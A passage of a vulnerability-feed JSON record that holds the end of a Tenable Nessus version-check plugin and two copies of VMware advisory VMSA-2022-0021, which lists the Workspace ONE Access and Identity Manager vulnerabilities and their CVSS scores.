script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware Workspace ONE Access CVE-2022-31660');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:identity_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workspace_one_access\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workspace_one_access_web_detect.nbin\", \"vmware_workspace_one_access_installed.nbin\");\n script_require_keys(\"installed_sw/VMware Workspace ONE Access\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app = 'VMware Workspace ONE Access';\n\nvar app_info = vcf::vmware_workspace_one_access::get_app_info(combined:TRUE);\n\n# 3.3.[3456] don't have fixed builds, so audit out unless we are doing a paranoid scan\n# Remote detection does not pull hotfixes. 
Require paranoia\nif ((app_info.webapp || app_info.version =~ \"3\\.3\\.[3456]\\.\") && report_paranoia < 2)\n audit(AUDIT_POTENTIAL_VULN, app, app_info.version);\n\nvar patch = '160130';\n\nvar constraints = [\n { 'min_version':'3.3.4.0.0', 'fixed_version':'3.3.7.0.0', 'fixed_display':'Refer to vendor advisory and apply patch HW-160130.' },\n\n { 'min_version':'19.03.0.1', 'max_version':'19.03.0.1.99999999', 'fixed_display':'19.03.0.1 with HW-160130' },\n \n { 'min_version':'21.08.0.0.0', 'max_version':'21.08.0.0.99999999', 'fixed_display':'21.08.0.0 with HW-160130' },\n { 'min_version':'21.08.0.1', 'max_version':'21.08.0.1.99999999', 'fixed_display':'21.08.0.1 with HW-160130' }\n];\n\nvcf::vmware_workspace_one_access::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, expected_patch:patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "vmware": [{"lastseen": "2022-08-12T17:12:24", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. 
Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. \n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. 
VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-02T00:00:00", "id": "VMSA-2022-0021", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-03T15:24:28", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. 
SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. \n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. 
Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-09T00:00:00", "id": "VMSA-2022-0021.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.1.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}